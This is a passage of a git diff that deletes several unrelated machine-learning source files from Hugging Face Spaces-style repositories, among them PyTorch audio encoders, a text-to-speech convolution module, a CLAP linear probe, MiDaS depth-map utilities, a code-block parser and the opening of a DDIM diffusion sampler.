(2, 4)), - Block2D(32, 128), - Block2D(128, 128), - nn.LPPool2d(4, (2, 4)), - Block2D(128, 128), - Block2D(128, 128), - nn.LPPool2d(4, (1, 4)), - nn.Dropout(0.3), - ) - with torch.no_grad(): - rnn_input_dim = self.features( - torch.randn(1, 1, 500, spec_dim)).shape - rnn_input_dim = rnn_input_dim[1] * rnn_input_dim[-1] - - self.gru = nn.GRU(rnn_input_dim, - 128, - bidirectional=True, - batch_first=True) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - if "upsample" not in input_dict: - input_dict["upsample"] = False - lens = torch.as_tensor(copy.deepcopy(lens)) - N, T, _ = x.shape - x = x.unsqueeze(1) - x = self.features(x) - x = x.transpose(1, 2).contiguous().flatten(-2) - x, _ = self.gru(x) - if input_dict["upsample"]: - x = nn.functional.interpolate( - x.transpose(1, 2), - T, - mode='linear', - align_corners=False).transpose(1, 2) - else: - lens //= 4 - attn_emb = x - fc_emb = embedding_pooling(x, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -def conv_conv_block(in_channel, out_channel): - return nn.Sequential( - nn.Conv2d(in_channel, - out_channel, - kernel_size=3, - bias=False, - padding=1), - nn.BatchNorm2d(out_channel), - nn.ReLU(True), - nn.Conv2d(out_channel, - out_channel, - kernel_size=3, - bias=False, - padding=1), - nn.BatchNorm2d(out_channel), - nn.ReLU(True) - ) - - -class Cdur8Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, pooling="mean"): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.features = nn.Sequential( - conv_conv_block(1, 64), - MMPool((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(64, 128), - MMPool((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(128, 256), - MMPool((1, 2)), - nn.Dropout(0.2, True), - conv_conv_block(256, 512), - MMPool((1, 2)), - nn.Dropout(0.2, True), - nn.AdaptiveAvgPool2d((None, 1)), - ) - self.init_bn = nn.BatchNorm2d(spec_dim) - self.embedding = nn.Linear(512, 512) - self.gru = nn.GRU(512, 256, bidirectional=True, batch_first=True) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - lens = torch.as_tensor(copy.deepcopy(lens)) - x = x.unsqueeze(1) # B x 1 x T x D - x = x.transpose(1, 3) - x = self.init_bn(x) - x = x.transpose(1, 3) - x = self.features(x) - x = x.transpose(1, 2).contiguous().flatten(-2) - x = F.dropout(x, p=0.5, training=self.training) - x = F.relu_(self.embedding(x)) - x, _ = self.gru(x) - attn_emb = x - lens //= 4 - fc_emb = embedding_pooling(x, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class Cnn10Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.features = nn.Sequential( - conv_conv_block(1, 64), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(64, 128), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(128, 256), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(256, 512), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - nn.AdaptiveAvgPool2d((None, 1)), - ) - self.init_bn = nn.BatchNorm2d(spec_dim) - self.embedding = nn.Linear(512, 512) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - lens = torch.as_tensor(copy.deepcopy(lens)) - x = x.unsqueeze(1) # [N, 1, T, D] - x = x.transpose(1, 3) - x = self.init_bn(x) - x = x.transpose(1, 3) - x = self.features(x) # [N, 512, T/16, 1] - x = x.transpose(1, 2).contiguous().flatten(-2) # [N, T/16, 512] - attn_emb = x - lens //= 16 - fc_emb = embedding_pooling(x, lens, "mean+max") - fc_emb = F.dropout(fc_emb, p=0.5, training=self.training) - fc_emb = self.embedding(fc_emb) - fc_emb = F.relu_(fc_emb) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class ConvBlock(nn.Module): - def __init__(self, in_channels, out_channels): - - super(ConvBlock, self).__init__() - - self.conv1 = nn.Conv2d(in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), stride=(1, 1), - padding=(1, 1), bias=False) - - self.conv2 = nn.Conv2d(in_channels=out_channels, - out_channels=out_channels, - kernel_size=(3, 3), stride=(1, 1), - padding=(1, 1), bias=False) - - self.bn1 = nn.BatchNorm2d(out_channels) - self.bn2 = nn.BatchNorm2d(out_channels) - - self.init_weight() - - def init_weight(self): - init_layer(self.conv1) - init_layer(self.conv2) - init_bn(self.bn1) - init_bn(self.bn2) - - - def forward(self, input, pool_size=(2, 2), pool_type='avg'): - - x = input - x = F.relu_(self.bn1(self.conv1(x))) - x = F.relu_(self.bn2(self.conv2(x))) - if pool_type == 'max': - x = F.max_pool2d(x, kernel_size=pool_size) - elif pool_type == 'avg': - x = F.avg_pool2d(x, kernel_size=pool_size) - elif pool_type == 'avg+max': - x1 = F.avg_pool2d(x, kernel_size=pool_size) - x2 = F.max_pool2d(x, kernel_size=pool_size) - x = x1 + x2 - else: - raise Exception('Incorrect argument!') - - return x - - -class Cnn14Encoder(nn.Module): - def __init__(self, sample_rate=32000): - super().__init__() - sr_to_fmax = { - 32000: 14000, - 16000: 8000 - } - # Logmel spectrogram extractor - self.melspec_extractor = transforms.MelSpectrogram( - sample_rate=sample_rate, - n_fft=32 * sample_rate // 1000, - win_length=32 * sample_rate // 1000, - hop_length=10 * sample_rate // 1000, - f_min=50, - f_max=sr_to_fmax[sample_rate], - n_mels=64, - norm="slaney", - mel_scale="slaney" - ) - self.hop_length = 10 * sample_rate // 1000 - self.db_transform = transforms.AmplitudeToDB() - # Spec augmenter - self.spec_augmenter = SpecAugmentation(time_drop_width=64, - time_stripes_num=2, freq_drop_width=8, freq_stripes_num=2) - - self.bn0 = nn.BatchNorm2d(64) - - self.conv_block1 = ConvBlock(in_channels=1, out_channels=64) - self.conv_block2 = ConvBlock(in_channels=64, out_channels=128) - self.conv_block3 = ConvBlock(in_channels=128, out_channels=256) - self.conv_block4 = ConvBlock(in_channels=256, out_channels=512) - self.conv_block5 = ConvBlock(in_channels=512, out_channels=1024) - self.conv_block6 = ConvBlock(in_channels=1024, out_channels=2048) - - self.downsample_ratio = 32 - - self.fc1 = nn.Linear(2048, 2048, bias=True) - - self.init_weight() - - def init_weight(self): - init_bn(self.bn0) - init_layer(self.fc1) - - def load_pretrained(self, pretrained): - checkpoint = torch.load(pretrained, map_location="cpu") - - if "model" in checkpoint: - state_keys = checkpoint["model"].keys() - backbone = False - for key in state_keys: - if key.startswith("backbone."): - backbone = True - break - - if backbone: # COLA - state_dict = {} - for key, value in checkpoint["model"].items(): - if key.startswith("backbone."): - model_key = key.replace("backbone.", "") - state_dict[model_key] = value - else: # PANNs - state_dict = checkpoint["model"] - elif "state_dict" in checkpoint: # CLAP - state_dict = checkpoint["state_dict"] - state_dict_keys = list(filter( - lambda x: "audio_encoder" in x, state_dict.keys())) - state_dict = { - key.replace('audio_encoder.', ''): state_dict[key] - for key in state_dict_keys - } - else: - raise Exception("Unkown checkpoint format") - - model_dict = self.state_dict() - pretrained_dict = { - k: v for k, v in state_dict.items() if (k in model_dict) and ( - model_dict[k].shape == v.shape) - } - model_dict.update(pretrained_dict) - self.load_state_dict(model_dict, strict=True) - - def forward(self, input_dict): - """ - Input: (batch_size, n_samples)""" - waveform = input_dict["wav"] - wave_length = input_dict["wav_len"] - specaug = input_dict["specaug"] - x = self.melspec_extractor(waveform) - x = self.db_transform(x) # (batch_size, mel_bins, time_steps) - x = x.transpose(1, 2) - x = x.unsqueeze(1) # (batch_size, 1, time_steps, mel_bins) - - # SpecAugment - if self.training and specaug: - x = self.spec_augmenter(x) - - x = x.transpose(1, 3) - x = self.bn0(x) - x = x.transpose(1, 3) - - x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block4(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block5(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block6(x, pool_size=(1, 1), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = torch.mean(x, dim=3) - attn_emb = x.transpose(1, 2) - - wave_length = torch.as_tensor(wave_length) - feat_length = torch.div(wave_length, self.hop_length, - rounding_mode="floor") + 1 - feat_length = torch.div(feat_length, self.downsample_ratio, - rounding_mode="floor") - x_max = max_with_lens(attn_emb, feat_length) - x_mean = mean_with_lens(attn_emb, feat_length) - x = x_max + x_mean - x = F.dropout(x, p=0.5, training=self.training) - x = F.relu_(self.fc1(x)) - fc_emb = F.dropout(x, p=0.5, training=self.training) - - output_dict = { - 'fc_emb': fc_emb, - 'attn_emb': attn_emb, - 'attn_emb_len': feat_length - } - - return output_dict - - -class RnnEncoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, - pooling="mean", **kwargs): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.hidden_size = kwargs.get('hidden_size', 512) - self.bidirectional = kwargs.get('bidirectional', False) - self.num_layers = kwargs.get('num_layers', 1) - self.dropout = kwargs.get('dropout', 0.2) - self.rnn_type = kwargs.get('rnn_type', "GRU") - self.in_bn = kwargs.get('in_bn', False) - self.embed_dim = self.hidden_size * (self.bidirectional + 1) - self.network = getattr(nn, self.rnn_type)( - attn_feat_dim, - self.hidden_size, - num_layers=self.num_layers, - bidirectional=self.bidirectional, - dropout=self.dropout, - batch_first=True) - if self.in_bn: - self.bn = nn.BatchNorm1d(self.embed_dim) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["attn"] - lens = input_dict["attn_len"] - lens = torch.as_tensor(lens) - # x: [N, T, E] - if self.in_bn: - x = pack_wrapper(self.bn, x, lens) - out = pack_wrapper(self.network, x, lens) - # out: [N, T, hidden] - attn_emb = out - fc_emb = embedding_pooling(out, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class Cnn14RnnEncoder(nn.Module): - def __init__(self, sample_rate=32000, pretrained=None, - freeze_cnn=False, freeze_cnn_bn=False, - pooling="mean", **kwargs): - super().__init__() - self.cnn = Cnn14Encoder(sample_rate) - self.rnn = RnnEncoder(64, 2048, 2048, pooling, **kwargs) - if pretrained is not None: - self.cnn.load_pretrained(pretrained) - if freeze_cnn: - assert pretrained is not None, "cnn is not pretrained but frozen" - for param in self.cnn.parameters(): - param.requires_grad = False - self.freeze_cnn_bn = freeze_cnn_bn - - def train(self, mode): - super().train(mode=mode) - if self.freeze_cnn_bn: - def bn_eval(module): - class_name = module.__class__.__name__ - if class_name.find("BatchNorm") != -1: - module.eval() - self.cnn.apply(bn_eval) - return self - - def forward(self, input_dict): - output_dict = self.cnn(input_dict) - output_dict["attn"] = output_dict["attn_emb"] - output_dict["attn_len"] = output_dict["attn_emb_len"] - del output_dict["attn_emb"], output_dict["attn_emb_len"] - output_dict = self.rnn(output_dict) - return output_dict - - -class TransformerEncoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, d_model, **kwargs): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.d_model = d_model - dropout = kwargs.get("dropout", 0.2) - self.nhead = kwargs.get("nhead", self.d_model // 64) - self.nlayers = kwargs.get("nlayers", 2) - self.dim_feedforward = kwargs.get("dim_feedforward", self.d_model * 4) - - self.attn_proj = nn.Sequential( - nn.Linear(attn_feat_dim, self.d_model), - nn.ReLU(), - nn.Dropout(dropout), - nn.LayerNorm(self.d_model) - ) - layer = nn.TransformerEncoderLayer(d_model=self.d_model, - nhead=self.nhead, - dim_feedforward=self.dim_feedforward, - dropout=dropout) - self.model = nn.TransformerEncoder(layer, self.nlayers) - self.cls_token = nn.Parameter(torch.zeros(d_model)) - self.init_params() - - def init_params(self): - for p in self.parameters(): - if p.dim() > 1: - nn.init.xavier_uniform_(p) - - def forward(self, input_dict): - attn_feat = input_dict["attn"] - attn_feat_len = input_dict["attn_len"] - attn_feat_len = torch.as_tensor(attn_feat_len) - - attn_feat = self.attn_proj(attn_feat) # [bs, T, d_model] - - cls_emb = self.cls_token.reshape(1, 1, self.d_model).repeat( - attn_feat.size(0), 1, 1) - attn_feat = torch.cat((cls_emb, attn_feat), dim=1) - attn_feat = attn_feat.transpose(0, 1) - - attn_feat_len += 1 - src_key_padding_mask = ~generate_length_mask( - attn_feat_len, attn_feat.size(0)).to(attn_feat.device) - output = self.model(attn_feat, src_key_padding_mask=src_key_padding_mask) - - attn_emb = output.transpose(0, 1) - fc_emb = attn_emb[:, 0] - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": attn_feat_len - } - - -class Cnn14TransformerEncoder(nn.Module): - def __init__(self, sample_rate=32000, pretrained=None, - freeze_cnn=False, freeze_cnn_bn=False, - d_model="mean", **kwargs): - super().__init__() - self.cnn = Cnn14Encoder(sample_rate) - self.trm = TransformerEncoder(64, 2048, 2048, d_model, **kwargs) - if pretrained is not None: - self.cnn.load_pretrained(pretrained) - if freeze_cnn: - assert pretrained is not None, "cnn is not pretrained but frozen" - for param in self.cnn.parameters(): - param.requires_grad = False - self.freeze_cnn_bn = freeze_cnn_bn - - def train(self, mode): - super().train(mode=mode) - if self.freeze_cnn_bn: - def bn_eval(module): - class_name = module.__class__.__name__ - if class_name.find("BatchNorm") != -1: - module.eval() - self.cnn.apply(bn_eval) - return self - - def forward(self, input_dict): - output_dict = self.cnn(input_dict) - output_dict["attn"] = output_dict["attn_emb"] - output_dict["attn_len"] = output_dict["attn_emb_len"] - del output_dict["attn_emb"], output_dict["attn_emb_len"] - output_dict = self.trm(output_dict) - return output_dict - - - - - diff --git a/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py b/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py deleted file mode 100644 index 7edf126a080767f760dc7d19a349fb9a44afeb46..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py +++ /dev/null @@ -1,167 +0,0 @@ -import math -import torch -import torch.nn as nn -import torch.nn.functional as F - -from text_to_speech.modules.commons.layers import LayerNorm, Embedding - - -class LambdaLayer(nn.Module): - def __init__(self, lambd): - super(LambdaLayer, self).__init__() - self.lambd = lambd - - def forward(self, x): - return self.lambd(x) - - -def init_weights_func(m): - classname = m.__class__.__name__ - if classname.find("Conv1d") != -1: - torch.nn.init.xavier_uniform_(m.weight) - - -class ResidualBlock(nn.Module): - """Implements conv->PReLU->norm n-times""" - - def __init__(self, channels, kernel_size, dilation, n=2, norm_type='bn', dropout=0.0, - c_multiple=2, ln_eps=1e-12): - super(ResidualBlock, self).__init__() - - if norm_type == 'bn': - norm_builder = lambda: nn.BatchNorm1d(channels) - elif norm_type == 'in': - norm_builder = lambda: nn.InstanceNorm1d(channels, affine=True) - elif norm_type == 'gn': - norm_builder = lambda: nn.GroupNorm(8, channels) - elif norm_type == 'ln': - norm_builder = lambda: LayerNorm(channels, dim=1, eps=ln_eps) - else: - norm_builder = lambda: nn.Identity() - - self.blocks = [ - nn.Sequential( - norm_builder(), - nn.Conv1d(channels, c_multiple * channels, kernel_size, dilation=dilation, - padding=(dilation * (kernel_size - 1)) // 2), - LambdaLayer(lambda x: x * kernel_size ** -0.5), - nn.GELU(), - nn.Conv1d(c_multiple * channels, channels, 1, dilation=dilation), - ) - for i in range(n) - ] - - self.blocks = nn.ModuleList(self.blocks) - self.dropout = dropout - - def forward(self, x): - nonpadding = (x.abs().sum(1) > 0).float()[:, None, :] - for b in self.blocks: - x_ = b(x) - if self.dropout > 0 and self.training: - x_ = F.dropout(x_, self.dropout, training=self.training) - x = x + x_ - x = x * nonpadding - return x - - -class ConvBlocks(nn.Module): - """Decodes the expanded phoneme encoding into spectrograms""" - - def __init__(self, hidden_size, out_dims, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, - init_weights=True, is_BTC=True, num_layers=None, post_net_kernel=3): - super(ConvBlocks, self).__init__() - self.is_BTC = is_BTC - if num_layers is not None: - dilations = [1] * num_layers - self.res_blocks = nn.Sequential( - *[ResidualBlock(hidden_size, kernel_size, d, - n=layers_in_block, norm_type=norm_type, c_multiple=c_multiple, - dropout=dropout, ln_eps=ln_eps) - for d in dilations], - ) - if norm_type == 'bn': - norm = nn.BatchNorm1d(hidden_size) - elif norm_type == 'in': - norm = nn.InstanceNorm1d(hidden_size, affine=True) - elif norm_type == 'gn': - norm = nn.GroupNorm(8, hidden_size) - elif norm_type == 'ln': - norm = LayerNorm(hidden_size, dim=1, eps=ln_eps) - self.last_norm = norm - self.post_net1 = nn.Conv1d(hidden_size, out_dims, kernel_size=post_net_kernel, - padding=post_net_kernel // 2) - if init_weights: - self.apply(init_weights_func) - - def forward(self, x, nonpadding=None): - """ - - :param x: [B, T, H] - :return: [B, T, H] - """ - if self.is_BTC: - x = x.transpose(1, 2) - if nonpadding is None: - nonpadding = (x.abs().sum(1) > 0).float()[:, None, :] - elif self.is_BTC: - nonpadding = nonpadding.transpose(1, 2) - x = self.res_blocks(x) * nonpadding - x = self.last_norm(x) * nonpadding - x = self.post_net1(x) * nonpadding - if self.is_BTC: - x = x.transpose(1, 2) - return x - - -class TextConvEncoder(ConvBlocks): - def __init__(self, dict_size, hidden_size, out_dims, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, init_weights=True, num_layers=None, post_net_kernel=3): - super().__init__(hidden_size, out_dims, dilations, kernel_size, - norm_type, layers_in_block, c_multiple, - dropout, ln_eps, init_weights, num_layers=num_layers, - post_net_kernel=post_net_kernel) - self.embed_tokens = Embedding(dict_size, hidden_size, 0) - self.embed_scale = math.sqrt(hidden_size) - - def forward(self, txt_tokens): - """ - - :param txt_tokens: [B, T] - :return: { - 'encoder_out': [B x T x C] - } - """ - x = self.embed_scale * self.embed_tokens(txt_tokens) - return super().forward(x) - - -class ConditionalConvBlocks(ConvBlocks): - def __init__(self, hidden_size, c_cond, c_out, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, init_weights=True, is_BTC=True, num_layers=None): - super().__init__(hidden_size, c_out, dilations, kernel_size, - norm_type, layers_in_block, c_multiple, - dropout, ln_eps, init_weights, is_BTC=False, num_layers=num_layers) - self.g_prenet = nn.Conv1d(c_cond, hidden_size, 3, padding=1) - self.is_BTC_ = is_BTC - if init_weights: - self.g_prenet.apply(init_weights_func) - - def forward(self, x, cond, nonpadding=None): - if self.is_BTC_: - x = x.transpose(1, 2) - cond = cond.transpose(1, 2) - if nonpadding is not None: - nonpadding = nonpadding.transpose(1, 2) - if nonpadding is None: - nonpadding = x.abs().sum(1)[:, None] - x = x + self.g_prenet(cond) - x = x * nonpadding - x = super(ConditionalConvBlocks, self).forward(x) # input needs to be BTC - if self.is_BTC_: - x = x.transpose(1, 2) - return x diff --git a/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py b/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py deleted file mode 100644 index bb2841dd4e28201db8b5bd4a215e1b8b9a60d25a..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py +++ /dev/null @@ -1,63 +0,0 @@ -import numpy as np -import torch.nn.functional as F -from torch import nn -from .model import MLPLayers - - -class LinearProbe(nn.Module): - def __init__(self, model, mlp, freeze, in_ch, out_ch, act=None): - """ - Args: - model: nn.Module - mlp: bool, if True, then use the MLP layer as the linear probe module - freeze: bool, if Ture, then freeze all the CLAP model's layers when training the linear probe - in_ch: int, the output channel from CLAP model - out_ch: int, the output channel from linear probe (class_num) - act: torch.nn.functional, the activation function before the loss function - """ - super().__init__() - in_ch = 512 - self.clap_model = model - self.clap_model.text_branch = None # to save memory - self.freeze = freeze - if mlp: - self.lp_layer = MLPLayers(units=[in_ch, in_ch * 2, out_ch]) - else: - self.lp_layer = nn.Linear(in_ch, out_ch) - - if self.freeze: - for param in self.clap_model.parameters(): - param.requires_grad = False - - if act == 'None': - self.act = None - elif act == 'relu': - self.act = nn.ReLU() - elif act == 'elu': - self.act = nn.ELU() - elif act == 'prelu': - self.act = nn.PReLU(num_parameters=in_ch) - elif act == 'softmax': - self.act = nn.Softmax(dim=-1) - elif act == 'sigmoid': - self.act = nn.Sigmoid() - - def forward(self, x, mix_lambda=None, device=None): - """ - Args: - x: waveform, torch.tensor [batch, t_samples] / batch of mel_spec and longer list - mix_lambda: torch.tensor [batch], the mixup lambda - Returns: - class_prob: torch.tensor [batch, class_num] - - """ - # batchnorm cancel grandient - if self.freeze: - self.clap_model.eval() - - x = self.clap_model.audio_projection( - self.clap_model.audio_branch(x, mixup_lambda=mix_lambda, device=device)["embedding"]) - out = self.lp_layer(x) - if self.act is not None: - out = self.act(out) - return out diff --git a/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py b/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py deleted file mode 100644 index 9a9d3b5b66370fa98da9e067ba53ead848ea9a59..0000000000000000000000000000000000000000 --- a/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py +++ /dev/null @@ -1,189 +0,0 @@ -"""Utils for monoDepth.""" -import sys -import re -import numpy as np -import cv2 -import torch - - -def read_pfm(path): - """Read pfm file. - - Args: - path (str): path to file - - Returns: - tuple: (data, scale) - """ - with open(path, "rb") as file: - - color = None - width = None - height = None - scale = None - endian = None - - header = file.readline().rstrip() - if header.decode("ascii") == "PF": - color = True - elif header.decode("ascii") == "Pf": - color = False - else: - raise Exception("Not a PFM file: " + path) - - dim_match = re.match(r"^(\d+)\s(\d+)\s$", file.readline().decode("ascii")) - if dim_match: - width, height = list(map(int, dim_match.groups())) - else: - raise Exception("Malformed PFM header.") - - scale = float(file.readline().decode("ascii").rstrip()) - if scale < 0: - # little-endian - endian = "<" - scale = -scale - else: - # big-endian - endian = ">" - - data = np.fromfile(file, endian + "f") - shape = (height, width, 3) if color else (height, width) - - data = np.reshape(data, shape) - data = np.flipud(data) - - return data, scale - - -def write_pfm(path, image, scale=1): - """Write pfm file. - - Args: - path (str): pathto file - image (array): data - scale (int, optional): Scale. Defaults to 1. - """ - - with open(path, "wb") as file: - color = None - - if image.dtype.name != "float32": - raise Exception("Image dtype must be float32.") - - image = np.flipud(image) - - if len(image.shape) == 3 and image.shape[2] == 3: # color image - color = True - elif ( - len(image.shape) == 2 or len(image.shape) == 3 and image.shape[2] == 1 - ): # greyscale - color = False - else: - raise Exception("Image must have H x W x 3, H x W x 1 or H x W dimensions.") - - file.write("PF\n" if color else "Pf\n".encode()) - file.write("%d %d\n".encode() % (image.shape[1], image.shape[0])) - - endian = image.dtype.byteorder - - if endian == "<" or endian == "=" and sys.byteorder == "little": - scale = -scale - - file.write("%f\n".encode() % scale) - - image.tofile(file) - - -def read_image(path): - """Read image and output RGB image (0-1). - - Args: - path (str): path to file - - Returns: - array: RGB image (0-1) - """ - img = cv2.imread(path) - - if img.ndim == 2: - img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) - - img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) / 255.0 - - return img - - -def resize_image(img): - """Resize image and make it fit for network. - - Args: - img (array): image - - Returns: - tensor: data ready for network - """ - height_orig = img.shape[0] - width_orig = img.shape[1] - - if width_orig > height_orig: - scale = width_orig / 384 - else: - scale = height_orig / 384 - - height = (np.ceil(height_orig / scale / 32) * 32).astype(int) - width = (np.ceil(width_orig / scale / 32) * 32).astype(int) - - img_resized = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA) - - img_resized = ( - torch.from_numpy(np.transpose(img_resized, (2, 0, 1))).contiguous().float() - ) - img_resized = img_resized.unsqueeze(0) - - return img_resized - - -def resize_depth(depth, width, height): - """Resize depth map and bring to CPU (numpy). - - Args: - depth (tensor): depth - width (int): image width - height (int): image height - - Returns: - array: processed depth - """ - depth = torch.squeeze(depth[0, :, :, :]).to("cpu") - - depth_resized = cv2.resize( - depth.numpy(), (width, height), interpolation=cv2.INTER_CUBIC - ) - - return depth_resized - -def write_depth(path, depth, bits=1): - """Write depth map to pfm and png file. - - Args: - path (str): filepath without extension - depth (array): depth - """ - write_pfm(path + ".pfm", depth.astype(np.float32)) - - depth_min = depth.min() - depth_max = depth.max() - - max_val = (2**(8*bits))-1 - - if depth_max - depth_min > np.finfo("float").eps: - out = max_val * (depth - depth_min) / (depth_max - depth_min) - else: - out = np.zeros(depth.shape, dtype=depth.type) - - if bits == 1: - cv2.imwrite(path + ".png", out.astype("uint8")) - elif bits == 2: - cv2.imwrite(path + ".png", out.astype("uint16")) - - return diff --git a/spaces/AIatUIUC/CodeLATS/generators/parse.py b/spaces/AIatUIUC/CodeLATS/generators/parse.py deleted file mode 100644 index c4e925f38f5cb2cf5afdbe804bf9c075b5f4782b..0000000000000000000000000000000000000000 --- a/spaces/AIatUIUC/CodeLATS/generators/parse.py +++ /dev/null @@ -1,49 +0,0 @@ -import re -from typing import Optional - - -def parse_code_block(string: str, lang: str) -> Optional[str]: - code_pattern = fr"```{lang}\n(.*?)\n```" - match = re.search(code_pattern, string, re.DOTALL) - - if match: - return match.group(1) - - generic_code_pattern = r"```\n(.*?)\n```" - match = re.search(generic_code_pattern, string, re.DOTALL) - - if match: - return match.group(1) - - return parse_first_func(string, lang) - - -def parse_first_func(code: str, lang: str) -> Optional[str]: - assert lang == "python", "Only python is supported for now. TODO: Rust" - code_lines = code.split("\n") - def_i = -1 - last_i = 0 - got_return = False - for i, line in enumerate(code_lines): - if line.startswith("def "): - if def_i == -1: - def_i = i - else: - break - elif "return" in line and def_i != -1: - got_return = True - if line == "" and def_i != -1 and got_return: - last_i = i - break - - if last_i == 0: - last_i = len(code_lines) - 1 - - if def_i == -1: - return None - - return "\n".join(code_lines[def_i:last_i+1]).rstrip("[/PYTHON]") - - -def add_code_block(string: str, lang: str) -> str: - return f"```{lang}\n{string}\n```" diff --git a/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py b/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py deleted file mode 100644 index 1b72e4b1226992226dfdad4200a9b9973e658929..0000000000000000000000000000000000000000 --- a/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py +++ /dev/null @@ -1,293 +0,0 @@ -"""SAMPLING ONLY.""" - -import torch -import numpy as np -from tqdm import tqdm - -from ldm.modules.diffusionmodules.util import make_ddim_sampling_parameters, make_ddim_timesteps, noise_like, \ - extract_into_tensor - - -class DDIMSampler(object): - def __init__(self, model, schedule="linear", **kwargs): - super().__init__() - self.model = model - self.ddpm_num_timesteps = model.num_timesteps - self.schedule = schedule - - def register_buffer(self, name, attr): - if type(attr) == torch.Tensor: - if attr.device != torch.device("cuda"): - attr = attr.to(torch.device("cuda")) - setattr(self, name, attr) - - def make_schedule(self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0., verbose=True): - self.ddim_timesteps = make_ddim_timesteps(ddim_discr_method=ddim_discretize, num_ddim_timesteps=ddim_num_steps, - num_ddpm_timesteps=self.ddpm_num_timesteps, verbose=verbose) - alphas_cumprod = self.model.alphas_cumprod - assert alphas_cumprod.shape[0] == self.ddpm_num_timesteps, 'alphas have to be defined for each timestep' - to_torch = lambda x: x.clone().detach().to(torch.float32).to(self.model.device) - - self.register_buffer('betas', to_torch(self.model.betas)) - self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod)) - self.register_buffer('alphas_cumprod_prev', to_torch(self.model.alphas_cumprod_prev)) - - # calculations for diffusion q(x_t | x_{t-1}) and others - self.register_buffer('sqrt_alphas_cumprod', to_torch(np.sqrt(alphas_cumprod.cpu()))) - self.register_buffer('sqrt_one_minus_alphas_cumprod', to_torch(np.sqrt(1. - alphas_cumprod.cpu()))) - self.register_buffer('log_one_minus_alphas_cumprod', to_torch(np.log(1. - alphas_cumprod.cpu()))) - self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod.cpu()))) - self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod.cpu() - 1))) - - # ddim sampling parameters - ddim_sigmas, ddim_alphas, ddim_alphas_prev = make_ddim_sampling_parameters(alphacums=alphas_cumprod.cpu(), - ddim_timesteps=self.ddim_timesteps, - eta=ddim_eta, verbose=verbose) - self.register_buffer('ddim_sigmas', ddim_sigmas) - self.register_buffer('ddim_alphas', ddim_alphas) - self.register_buffer('ddim_alphas_prev', ddim_alphas_prev) - self.register_buffer('ddim_sqrt_one_minus_alphas', np.sqrt(1. - ddim_alphas)) - sigmas_for_original_sampling_steps = ddim_eta * torch.sqrt( - (1 - self.alphas_cumprod_prev) / (1 - self.alphas_cumprod) * ( - 1 - self.alphas_cumprod / self.alphas_cumprod_prev)) - 